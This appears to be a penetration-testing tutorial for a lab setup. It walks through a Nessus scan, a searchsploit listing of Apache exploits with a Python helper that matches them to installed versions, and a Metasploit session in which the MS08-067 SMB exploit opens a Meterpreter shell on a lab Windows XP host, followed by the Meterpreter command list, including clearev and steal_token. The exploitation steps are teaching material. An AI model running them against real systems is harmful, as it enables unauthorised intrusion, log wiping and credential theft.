Exploit DB
The first step in finding the vulnerabilities of my target is to use Nessus (nessusd), a browser-based application that can find the weak points in a system. To run it:
Open your web browser and enter the IP address of the machine whose vulnerabilities you want to find; in this example it is 127.0.0.1:8834, where 8834 is the port nessusd listens on.
Enter the username and password that were created, then log in.
After that click Scan, then Add.
Enter a name in the Name column, change the policy to Internal Network Scan, enter the target, and start the scan.
After the scan has finished, click Report and download the scan results.
After that, open the Exploit DB application (searchsploit).
Then go through the vulnerabilities the Nessus scan reported and look for services that could be a way into the system.
This time I search the database for Apache.
root@bt:/pentest/exploits/exploitdb# ./searchsploit apache
Description    Path
---------------------------------------------------------------------------------------------------
Apache HTTP Server 2.x Memory Leak Exploit    /windows/dos/9.c
Apache <= 2.0.44 Linux Remote Denial of Service Exploit    /linux/dos/11.c
Webfroot Shoutbox < 2.32 (Apache) Remote Exploit    /linux/remote/34.pl
Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl    /linux/remote/38.pl
Apache 1.3.x mod_mylo Remote Code Execution Exploit    /multiple/remote/67.c
Apache mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit    /linux/remote/126.c
Apache 1.3.*-2.0.48 mod_userdir Remote Users Disclosure Exploit    /linux/remote/132.c
Apache HTTPd Arbitrary Long HTTP Headers DoS    /multiple/dos/360.pl
Apache HTTPd Arbitrary Long HTTP Headers DoS (c version)    /linux/dos/371.c
htpasswd Apache 1.3.31 Local Exploit    /linux/local/466.pl
Apache <= 1.3.31 mod_include Local Buffer Overflow Exploit    /linux/local/587.c
Apache OpenSSL Remote Exploit (Multiple Targets) (OpenFuckV2.c)    /linux/remote/764.c
Apache <= 2.0.52 HTTP GET request Denial of Service Exploit    /multiple/dos/855.pl
Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service    /multiple/dos/1056.pl
Apache Tomcat < 5.5.17 Remote Directory Listing Vulnerability    /multiple/remote/2061.txt
Apache < 1.3.37    /multiple/dos/2237.sh
Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit    /linux/local/3384.c
Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32)    /windows/remote/3680.sh
Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)    /windows/remote/3996.c
Apache mod_jk 1.2.19/1.2.20 Remote Buffer Overflow Exploit    /multiple/remote/4093.pl
Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield)    /linux/remote/4162.c
Apache Tomcat (webdav) Remote File Disclosure Exploit    /multiple/remote/4530.pl
Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support)    /linux/remote/4552.pl
mod_jk2 v2.0.2 for Apache 2.0 Remote Buffer Overflow Exploit (win32)    /windows/remote/5330.c
Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit    /linux/remote/5386.txt
Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit    /windows/remote/6089.pl
Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)    /windows/remote/6100.py
Apache Tomcat < 6.0.18 UTF8 Directory Traversal Vulnerability    /multiple/remote/6229.txt
Apache Tomcat runtime.getRuntime().exec() Privilege Escalation (win)    /windows/local/7264.txt
Apache Geronimo <= 2.1.3 Multiple Directory Traversal Vulnerabilities    /multiple/remote/8458.txt
Apache mod_dav / svn Remote Denial of Service Exploit    /multiple/dos/8842.pl
Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability    /multiple/remote/9993.txt
Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability    /multiple/remote/9994.txt
Apache Tomcat Form Authentication Username Enumeration Weakness    /multiple/remote/9995.txt
Apache Tomcat v3.2.1 404 Error Page Cross Site Scripting Vulnerability    /multiple/webapps/10292.txt
Joomla.Tutorials GHDB: Apache directory listing Download Vulnerability    /php/webapps/10811.txt
Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit    /windows/remote/11650.c
Apache Spamassassin Milter Plugin Remote Root Command Execution    /multiple/remote/11662.txt
Apache OFBiz SQL Remote Execution PoC Payload    /multiple/remote/12263.txt
Apache OFBiz FULLADMIN Creator PoC Payload    /multiple/remote/12264.txt
Multiple XSS in Apache OFBiz    /php/webapps/12330.txt
Apache Tomcat v. 5.5.0 to 5.5.29 & 6.0.0 to 6.0.26 information disclosure vulnerability    /multiple/remote/12343.txt
Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console    /multiple/webapps/12689.txt
Apache Axis2(1.4.1) Local File Inclusion Vulnerability    /php/webapps/12721.txt
Apache Tomcat < 6.0.18 UTF8 Directory Traversal Vulnerability    /unix/remote/14489.c
Apache JackRabbit 2.0.0 webapp XPath Injection    /jsp/webapps/14617.txt
Apache 2.2 (Windows) Local Denial of Service    /windows/dos/15319.pl
Apache Archiva 1.0 - 1.3.1 CSRF Vulnerability    /multiple/webapps/15710.txt
Apache Tomcat Manager Application Deployer Authenticated Code Execution    /multiple/remote/16317.rb
Apache module mod_rewrite LDAP protocol Buffer Overflow    /windows/remote/16752.rb
Apache Win32 Chunked Encoding    /windows/remote/16782.rb
Apache mod_jk 1.2.20 Buffer Overflow    /windows/remote/16798.rb
Apache Struts < 2.2.0 Remote Command Execution    /multiple/remote/17691.rb
Apache httpd Remote Denial of Service (memory exhaustion)    /multiple/dos/17696.pl
Apache mod_proxy Reverse Proxy Exposure Vulnerability PoC    /multiple/remote/17969.py
Apache HTTP Server Denial of Service    /linux/dos/18221.c
Apache Struts2 <= 2.3.1 Multiple Vulnerabilities    /multiple/webapps/18329.txt
Then find the entries in the Apache results whose service version matches the vulnerability that nessusd reported.
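As an added example that is not part of this post and not Exploit DB's own code: a small Python triage helper that reads a searchsploit Description/Path listing, pulls the version expression out of each description ("<= 2.0.44", "< 1.3.37", "2.x", "1.0 - 1.3.1", "5.5.0 to 5.5.29") and reports which entries cover the version the scanner reported, so those can be prioritised for patching. The SAMPLE text is constructed from a subset of the listing above; the function names and the exclude filter are my own.

```python
import re
from dataclasses import dataclass, field
from typing import List, Tuple

# A version token: at least one dotted numeric component, optionally ending in .x / .*
# (a single bare number such as "404" is deliberately not treated as a version).
_VER = r"\d+(?:\.\d+)+(?:\.[x*])?|\d+\.[x*]"
# Optional "<=" / "<" in front, optional "- B" / "to B" upper bound behind.
_CONSTRAINT = re.compile(
    rf"(?:(?P<op><=|<)\s*)?(?P<a>{_VER})(?:\s*(?:-|\bto\b)\s*(?P<b>{_VER}))?"
)
# One searchsploit row: free-text description, whitespace, then a path starting with "/".
_ROW = re.compile(r"^(?P<desc>.+?)\s+(?P<path>/\S+)$")

Version = Tuple[int, ...]


def vtuple(text: str) -> Version:
    """'2.0.44' -> (2, 0, 44); a trailing .x / .* wildcard is dropped."""
    return tuple(int(p) for p in text.split(".") if p.isdigit())


@dataclass
class Constraint:
    kind: str            # "prefix", "le", "lt" or "range"
    low: Version = ()
    high: Version = ()

    def matches(self, v: Version) -> bool:
        if self.kind == "prefix":      # "2.x", "1.3.*" or a bare "2.0.58": component-wise prefix
            return v[: len(self.low)] == self.low
        if self.kind == "le":          # "<= 2.0.44"
            return v <= self.high
        if self.kind == "lt":          # "< 1.3.37"
            return v < self.high
        return self.low <= v <= self.high   # "1.0 - 1.3.1", "5.5.0 to 5.5.29"


@dataclass
class Entry:
    description: str
    path: str
    constraints: List[Constraint] = field(default_factory=list)


def parse_constraints(desc: str) -> List[Constraint]:
    """Every version expression found in one description, in order."""
    out: List[Constraint] = []
    for m in _CONSTRAINT.finditer(desc):
        a, b, op = m.group("a"), m.group("b"), m.group("op")
        if b:
            out.append(Constraint("range", vtuple(a), vtuple(b)))
        elif op == "<=":
            out.append(Constraint("le", high=vtuple(a)))
        elif op == "<":
            out.append(Constraint("lt", high=vtuple(a)))
        else:
            out.append(Constraint("prefix", low=vtuple(a)))
    return out


def parse_searchsploit(text: str) -> List[Entry]:
    """Turn the Description/Path listing into Entry records; header and rule lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = _ROW.match(line.strip())
        if m:
            desc = m.group("desc").strip()
            entries.append(Entry(desc, m.group("path"), parse_constraints(desc)))
    return entries


def triage(entries: List[Entry], installed: str, product: str, exclude=()) -> List[str]:
    """Paths of entries that name `product`, name none of `exclude`, and whose version
    expression covers `installed`. Entries with no version expression never match and
    still need a manual look."""
    v = vtuple(installed)
    hits = []
    for e in entries:
        d = e.description.lower()
        if product.lower() not in d or any(x.lower() in d for x in exclude):
            continue
        if any(c.matches(v) for c in e.constraints):
            hits.append(e.path)
    return hits


# Constructed sample in searchsploit's two-column layout (a subset of the listing above).
SAMPLE = """\
Description                                                         Path
------------------------------------------------------------------ ------------------------
Apache HTTP Server 2.x Memory Leak Exploit                          /windows/dos/9.c
Apache <= 2.0.44 Linux Remote Denial of Service Exploit             /linux/dos/11.c
Apache 1.3.*-2.0.48 mod_userdir Remote Users Disclosure Exploit     /linux/remote/132.c
Apache <= 2.0.52 HTTP GET request Denial of Service Exploit         /multiple/dos/855.pl
Apache Tomcat < 5.5.17 Remote Directory Listing Vulnerability       /multiple/remote/2061.txt
Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)          /windows/remote/3996.c
Apache mod_dav / svn Remote Denial of Service Exploit               /multiple/dos/8842.pl
Apache Archiva 1.0 - 1.3.1 CSRF Vulnerability                       /multiple/webapps/15710.txt
"""

if __name__ == "__main__":
    # The scanner reported Apache httpd 2.0.52; Tomcat entries are a different product.
    for path in triage(parse_searchsploit(SAMPLE), "2.0.52", "Apache", exclude=("Tomcat",)):
        print(path)
```

The exclude filter is the important caveat: a plain version comparison would also flag "Apache Tomcat < 5.5.17" for httpd 2.0.52, because the product name in the description decides what the version refers to. Entries without any version expression (mod_dav / svn above) are never matched automatically and have to be read by hand.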
Metasploit
To see the modules for the SMB service:
msf > search smb

Matching Modules
================

   Name                                                        Disclosure Date  Rank       Description
   ----                                                        ---------------  ----       -----------
   auxiliary/admin/oracle/ora_ntlm_stealer                     2009-04-07       normal     Oracle SMB Relay Code Execution
   auxiliary/admin/smb/check_dir_file                                           normal     SMB Scanner Check File/Directory Utility
   auxiliary/admin/smb/samba_symlink_traversal                                  normal     Samba Symlink Directory Traversal
   auxiliary/admin/smb/upload_file                                              normal     SMB File Upload Utility
   auxiliary/dos/windows/smb/ms05_047_pnp                                       normal     Microsoft Plug and Play Service Registry Overflow
   auxiliary/dos/windows/smb/ms06_035_mailslot                 2006-07-11       normal     Microsoft SRV.SYS Mailslot Write Corruption
   auxiliary/dos/windows/smb/ms06_063_trans                                     normal     Microsoft SRV.SYS Pipe Transaction No Null
   auxiliary/dos/windows/smb/ms09_001_write                                     normal     Microsoft SRV.SYS WriteAndX Invalid DataOffset
   auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh                    normal     Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
   auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff                       normal     Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference
   auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop                   normal     Microsoft Windows 7 / Server 2008 R2 SMB Client Infinite Loop
   auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow                     normal     Microsoft Windows SRV.SYS SrvSmbQueryFsInformation Pool Overflow DoS
   auxiliary/dos/windows/smb/ms11_019_electbowser                               manual     Microsoft Windows Browser Pool DoS
   auxiliary/dos/windows/smb/rras_vls_null_deref               2006-06-14       normal     Microsoft RRAS InterfaceAdjustVLSPointers NULL Dereference
   auxiliary/dos/windows/smb/vista_negotiate_stop                               normal     Microsoft Vista SP0 SMB Negotiate Protocol DoS
   auxiliary/fuzzers/smb/smb2_negotiate_corrupt                                 normal     SMB Negotiate SMB2 Dialect Corruption
   auxiliary/fuzzers/smb/smb_create_pipe                                        normal     SMB Create Pipe Request Fuzzer
   auxiliary/fuzzers/smb/smb_create_pipe_corrupt                                normal     SMB Create Pipe Request Corruption
   auxiliary/fuzzers/smb/smb_negotiate_corrupt                                  normal     SMB Negotiate Dialect Corruption
   auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt                                normal     SMB NTLMv1 Login Request Corruption
   auxiliary/fuzzers/smb/smb_tree_connect                                       normal     SMB Tree Connect Request Fuzzer
   auxiliary/fuzzers/smb/smb_tree_connect_corrupt                               normal     SMB Tree Connect Request Corruption
   auxiliary/scanner/smb/pipe_auditor                                           normal     SMB Session Pipe Auditor
   auxiliary/scanner/smb/pipe_dcerpc_auditor                                    normal     SMB Session Pipe DCERPC Auditor
   auxiliary/scanner/smb/smb2                                                   normal     SMB 2.0 Protocol Detection
   auxiliary/scanner/smb/smb_enumshares                                         normal     SMB Share Enumeration
   auxiliary/scanner/smb/smb_enumusers                                          normal     SMB User Enumeration (SAM EnumUsers)
   auxiliary/scanner/smb/smb_enumusers_domain                                   normal     SMB Domain User Enumeration
   auxiliary/scanner/smb/smb_login                                              normal     SMB Login Check Scanner
   auxiliary/scanner/smb/smb_lookupsid                                          normal     SMB Local User Enumeration (LookupSid)
   auxiliary/scanner/smb/smb_version                                            normal     SMB Version Detection
   auxiliary/scanner/snmp/snmp_enumshares                                       normal     SNMP Windows SMB Share Enumeration
   auxiliary/server/capture/smb                                                 normal     Authentication Capture: SMB
   auxiliary/spoof/nbns/nbns_response                                           normal     NetBIOS Name Service Spoofer
   exploit/linux/samba/chain_reply                             2010-06-16       good       Samba chain_reply Memory Corruption (Linux x86)
   exploit/netware/smb/lsass_cifs                              2007-01-21       average    Novell NetWare LSASS CIFS.NLM Driver Stack Buffer Overflow
   exploit/osx/browser/safari_file_policy                      2011-10-12       normal     Apple Safari file:// Arbitrary Code Execution
   exploit/windows/browser/java_ws_arginject_altjvm            2010-04-09       excellent  Sun Java Web Start Plugin Command Line Argument Injection
   exploit/windows/browser/ms10_022_ie_vbscript_winhlp32       2010-02-26       great      Internet Explorer Winhlp32.exe MsgBox Code Execution
   exploit/windows/fileformat/ursoft_w32dasm                   2005-01-24       good       URSoft W32Dasm Disassembler Function Buffer Overflow
   exploit/windows/fileformat/vlc_smb_uri                      2009-06-24       great      VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow
   exploit/windows/oracle/extjob                               2007-01-01       excellent  Oracle Job Scheduler Named Pipe Command Execution
   exploit/windows/smb/ms03_049_netapi                         2003-11-11       good       Microsoft Workstation Service NetAddAlternateComputerName Overflow
   exploit/windows/smb/ms04_007_killbill                       2004-02-10       low        Microsoft ASN.1 Library Bitstring Heap Overflow
   exploit/windows/smb/ms04_011_lsass                          2004-04-13       good       Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow
   exploit/windows/smb/ms04_031_netdde                         2004-10-12       good       Microsoft NetDDE Service Overflow
   exploit/windows/smb/ms05_039_pnp                            2005-08-09       good       Microsoft Plug and Play Service Overflow
   exploit/windows/smb/ms06_025_rasmans_reg                    2006-06-13       good       Microsoft RRAS Service RASMAN Registry Overflow
   exploit/windows/smb/ms06_025_rras                           2006-06-13       average    Microsoft RRAS Service Overflow
   exploit/windows/smb/ms06_040_netapi                         2006-08-08       good       Microsoft Server Service NetpwPathCanonicalize Overflow
   exploit/windows/smb/ms06_066_nwapi                          2006-11-14       good       Microsoft Services MS06-066 nwapi32.dll
   exploit/windows/smb/ms06_066_nwwks                          2006-11-14       good       Microsoft Services MS06-066 nwwks.dll
   exploit/windows/smb/ms06_070_wkssvc                         2006-11-14       manual     Microsoft Workstation Service NetpManageIPCConnect Overflow
   exploit/windows/smb/ms07_029_msdns_zonename                 2007-04-12       manual     Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)
   exploit/windows/smb/ms08_067_netapi                         2008-10-28       great      Microsoft Server Service Relative Path Stack Corruption
   exploit/windows/smb/ms09_050_smb2_negotiate_func_index      2009-09-07       good       Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
   exploit/windows/smb/ms10_061_spoolss                        2010-09-14       excellent  Microsoft Print Spooler Service Impersonation Vulnerability
   exploit/windows/smb/netidentity_xtierrpcpipe                2009-04-06       great      Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow
   exploit/windows/smb/psexec                                  1999-01-01       manual     Microsoft Windows Authenticated User Code Execution
   exploit/windows/smb/smb_relay                               2001-03-31       excellent  Microsoft Windows SMB Relay Code Execution
   exploit/windows/smb/timbuktu_plughntcommand_bof             2009-06-25       great      Timbuktu <= 8.6.6 PlughNTCommand Named Pipe Buffer Overflow
   post/windows/gather/enum_shares                                              normal     Windows Gather SMB Share Enumeration via Registry
Then select the module that uses the SMB service for the exploitation and show its options:
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting
Then configure the IP address of the target that will be exploited and check the options again:
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.56.101   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting
To see the payloads that can be used with this module:
msf exploit(ms08_067_netapi) > show payloads

Compatible Payloads
===================

   Name                                               Disclosure Date  Rank    Description
   ----                                               ---------------  ----    -----------
   generic/custom                                                      normal  Custom Payload
   generic/debug_trap                                                  normal  Generic x86 Debug Trap
   generic/shell_bind_tcp                                              normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                                           normal  Generic Command Shell, Reverse TCP Inline
   generic/tight_loop                                                  normal  Generic x86 Tight Loop
   windows/adduser                                                     normal  Windows Execute net user /ADD
   windows/dllinject/bind_ipv6_tcp                                     normal  Reflective Dll Injection, Bind TCP Stager (IPv6)
   windows/dllinject/bind_nonx_tcp                                     normal  Reflective Dll Injection, Bind TCP Stager (No NX or Win7)
   windows/dllinject/bind_tcp                                          normal  Reflective Dll Injection, Bind TCP Stager
   windows/dllinject/reverse_http                                      normal  Reflective Dll Injection, Reverse HTTP Stager
   windows/dllinject/reverse_ipv6_http                                 normal  Reflective Dll Injection, Reverse HTTP Stager (IPv6)
   windows/dllinject/reverse_ipv6_tcp                                  normal  Reflective Dll Injection, Reverse TCP Stager (IPv6)
   windows/dllinject/reverse_nonx_tcp                                  normal  Reflective Dll Injection, Reverse TCP Stager (No NX or Win7)
   windows/dllinject/reverse_ord_tcp                                   normal  Reflective Dll Injection, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/dllinject/reverse_tcp                                       normal  Reflective Dll Injection, Reverse TCP Stager
   windows/dllinject/reverse_tcp_allports                              normal  Reflective Dll Injection, Reverse All-Port TCP Stager
   windows/dllinject/reverse_tcp_dns                                   normal  Reflective Dll Injection, Reverse TCP Stager (DNS)
   windows/download_exec                                               normal  Windows Executable Download and Execute
   windows/exec                                                        normal  Windows Execute Command
   windows/loadlibrary                                                 normal  Windows LoadLibrary Path
   windows/messagebox                                                  normal  Windows MessageBox
   windows/meterpreter/bind_ipv6_tcp                                   normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (IPv6)
   windows/meterpreter/bind_nonx_tcp                                   normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
   windows/meterpreter/bind_tcp                                        normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager
   windows/meterpreter/reverse_http                                    normal  Windows Meterpreter (Reflective Injection), Reverse HTTP Stager
   windows/meterpreter/reverse_https                                   normal  Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
   windows/meterpreter/reverse_ipv6_http                               normal  Windows Meterpreter (Reflective Injection), Reverse HTTP Stager (IPv6)
   windows/meterpreter/reverse_ipv6_https                              normal  Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager (IPv6)
   windows/meterpreter/reverse_ipv6_tcp                                normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
   windows/meterpreter/reverse_nonx_tcp                                normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   windows/meterpreter/reverse_ord_tcp                                 normal  Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/meterpreter/reverse_tcp                                     normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager
   windows/meterpreter/reverse_tcp_allports                            normal  Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
   windows/meterpreter/reverse_tcp_dns                                 normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
   windows/metsvc_bind_tcp                                             normal  Windows Meterpreter Service, Bind TCP
   windows/metsvc_reverse_tcp                                          normal  Windows Meterpreter Service, Reverse TCP Inline
   windows/patchupdllinject/bind_ipv6_tcp                              normal  Windows Inject DLL, Bind TCP Stager (IPv6)
   windows/patchupdllinject/bind_nonx_tcp                              normal  Windows Inject DLL, Bind TCP Stager (No NX or Win7)
   windows/patchupdllinject/bind_tcp                                   normal  Windows Inject DLL, Bind TCP Stager
   windows/patchupdllinject/reverse_ipv6_tcp                           normal  Windows Inject DLL, Reverse TCP Stager (IPv6)
   windows/patchupdllinject/reverse_nonx_tcp                           normal  Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
   windows/patchupdllinject/reverse_ord_tcp                            normal  Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/patchupdllinject/reverse_tcp                                normal  Windows Inject DLL, Reverse TCP Stager
   windows/patchupdllinject/reverse_tcp_allports                       normal  Windows Inject DLL, Reverse All-Port TCP Stager
   windows/patchupdllinject/reverse_tcp_dns                            normal  Windows Inject DLL, Reverse TCP Stager (DNS)
   windows/patchupmeterpreter/bind_ipv6_tcp                            normal  Windows Meterpreter (skape/jt injection), Bind TCP Stager (IPv6)
   windows/patchupmeterpreter/bind_nonx_tcp                            normal  Windows Meterpreter (skape/jt injection), Bind TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/bind_tcp                                 normal  Windows Meterpreter (skape/jt injection), Bind TCP Stager
   windows/patchupmeterpreter/reverse_ipv6_tcp                         normal  Windows Meterpreter (skape/jt injection), Reverse TCP Stager (IPv6)
   windows/patchupmeterpreter/reverse_nonx_tcp                         normal  Windows Meterpreter (skape/jt injection), Reverse TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/reverse_ord_tcp                          normal  Windows Meterpreter (skape/jt injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/reverse_tcp                              normal  Windows Meterpreter (skape/jt injection), Reverse TCP Stager
   windows/patchupmeterpreter/reverse_tcp_allports                     normal  Windows Meterpreter (skape/jt injection), Reverse All-Port TCP Stager
   windows/patchupmeterpreter/reverse_tcp_dns                          normal  Windows Meterpreter (skape/jt injection), Reverse TCP Stager (DNS)
   windows/shell/bind_ipv6_tcp                                         normal  Windows Command Shell, Bind TCP Stager (IPv6)
   windows/shell/bind_nonx_tcp                                         normal  Windows Command Shell, Bind TCP Stager (No NX or Win7)
   windows/shell/bind_tcp                                              normal  Windows Command Shell, Bind TCP Stager
   windows/shell/reverse_http                                          normal  Windows Command Shell, Reverse HTTP Stager
   windows/shell/reverse_ipv6_http                                     normal  Windows Command Shell, Reverse HTTP Stager (IPv6)
   windows/shell/reverse_ipv6_tcp                                      normal  Windows Command Shell, Reverse TCP Stager (IPv6)
   windows/shell/reverse_nonx_tcp                                      normal  Windows Command Shell, Reverse TCP Stager (No NX or Win7)
   windows/shell/reverse_ord_tcp                                       normal  Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/shell/reverse_tcp                                           normal  Windows Command Shell, Reverse TCP Stager
   windows/shell/reverse_tcp_allports                                  normal  Windows Command Shell, Reverse All-Port TCP Stager
   windows/shell/reverse_tcp_dns                                       normal  Windows Command Shell, Reverse TCP Stager (DNS)
   windows/shell_bind_tcp                                              normal  Windows Command Shell, Bind TCP Inline
   windows/shell_reverse_tcp                                           normal  Windows Command Shell, Reverse TCP Inline
   windows/speak_pwned                                                 normal  Windows Speech API - Say "You Got Pwned!"
   windows/upexec/bind_ipv6_tcp                                        normal  Windows Upload/Execute, Bind TCP Stager (IPv6)
   windows/upexec/bind_nonx_tcp                                        normal  Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
   windows/upexec/bind_tcp                                             normal  Windows Upload/Execute, Bind TCP Stager
   windows/upexec/reverse_http                                         normal  Windows Upload/Execute, Reverse HTTP Stager
   windows/upexec/reverse_ipv6_http                                    normal  Windows Upload/Execute, Reverse HTTP Stager (IPv6)
   windows/upexec/reverse_ipv6_tcp                                     normal  Windows Upload/Execute, Reverse TCP Stager (IPv6)
   windows/upexec/reverse_nonx_tcp                                     normal  Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
   windows/upexec/reverse_ord_tcp                                      normal  Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/upexec/reverse_tcp                                          normal  Windows Upload/Execute, Reverse TCP Stager
   windows/upexec/reverse_tcp_allports                                 normal  Windows Upload/Execute, Reverse All-Port TCP Stager
   windows/upexec/reverse_tcp_dns                                      normal  Windows Upload/Execute, Reverse TCP Stager (DNS)
   windows/vncinject/bind_ipv6_tcp                                     normal  VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
   windows/vncinject/bind_nonx_tcp                                     normal  VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
   windows/vncinject/bind_tcp                                          normal  VNC Server (Reflective Injection), Bind TCP Stager
   windows/vncinject/reverse_http                                      normal  VNC Server (Reflective Injection), Reverse HTTP Stager
   windows/vncinject/reverse_ipv6_http                                 normal  VNC Server (Reflective Injection), Reverse HTTP Stager (IPv6)
   windows/vncinject/reverse_ipv6_tcp                                  normal  VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
   windows/vncinject/reverse_nonx_tcp                                  normal  VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   windows/vncinject/reverse_ord_tcp                                   normal  VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/vncinject/reverse_tcp                                       normal  VNC Server (Reflective Injection), Reverse TCP Stager
   windows/vncinject/reverse_tcp_allports                              normal  VNC Server (Reflective Injection), Reverse All-Port TCP Stager
   windows/vncinject/reverse_tcp_dns                                   normal  VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
To set the payload used in the exploitation (note that the option is named payload, not payloads; the first attempt below shows the error for the wrong name), then check the target and run the exploit:
msf exploit(ms08_067_netapi) > set payloads
[-] Unknown variable
Usage: set [option] [value]

Set the given option to value.  If value
is omitted, print the current value.
If both are omitted, print options that
are currently set.

If run from a module context, this will
set the value in the module's datastore.  Use -g
to operate on the global datastore

msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > check
[*] Verifying vulnerable status... (path: 0x0000005a)
[+] The target is vulnerable.
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:40021 -> 192.168.56.101:4444) at 2012-01-28 03:13:59 +0700
To see the commands available in meterpreter:
meterpreter > help

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information about active channels
    close                     Closes a channel
    detach                    Detach the meterpreter session (for http/https)
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    help                      Help menu
    info                      Displays information about a Post module
    interact                  Interacts with a channel
    irb                       Drop into irb scripting mode
    load                      Load one or more meterpreter extensions
    migrate                   Migrate the server to another process
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    use                       Deprecated alias for 'load'
    write                     Writes data to a channel

Stdapi: File system Commands
============================

    Command   Description
    -------   -----------
    cat       Read the contents of a file to the screen
    cd        Change directory
    del       Delete the specified file
    download  Download a file or directory
    edit      Edit a file
    getlwd    Print local working directory
    getwd     Print working directory
    lcd       Change local working directory
    lpwd      Print local working directory
    ls        List files
    mkdir     Make directory
    pwd       Print working directory
    rm        Delete the specified file
    rmdir     Remove directory
    search    Search for files
    upload    Upload a file or directory

Stdapi: Networking Commands
===========================

    Command   Description
    -------   -----------
    ipconfig  Display interfaces
    portfwd   Forward a local port to a remote service
    route     View and modify the routing table

Stdapi: System Commands
=======================

    Command      Description
    -------      -----------
    clearev      Clear the event log
    drop_token   Relinquishes any active impersonation token.
    execute      Execute a command
    getpid       Get the current process identifier
    getprivs     Attempt to enable all privileges available to the current process
    getuid       Get the user that the server is running as
    kill         Terminate a process
    ps           List running processes
    reboot       Reboots the remote computer
    reg          Modify and interact with the remote registry
    rev2self     Calls RevertToSelf() on the remote machine
    shell        Drop into a system command shell
    shutdown     Shuts down the remote computer
    steal_token  Attempts to steal an impersonation token from the target process
    sysinfo      Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================

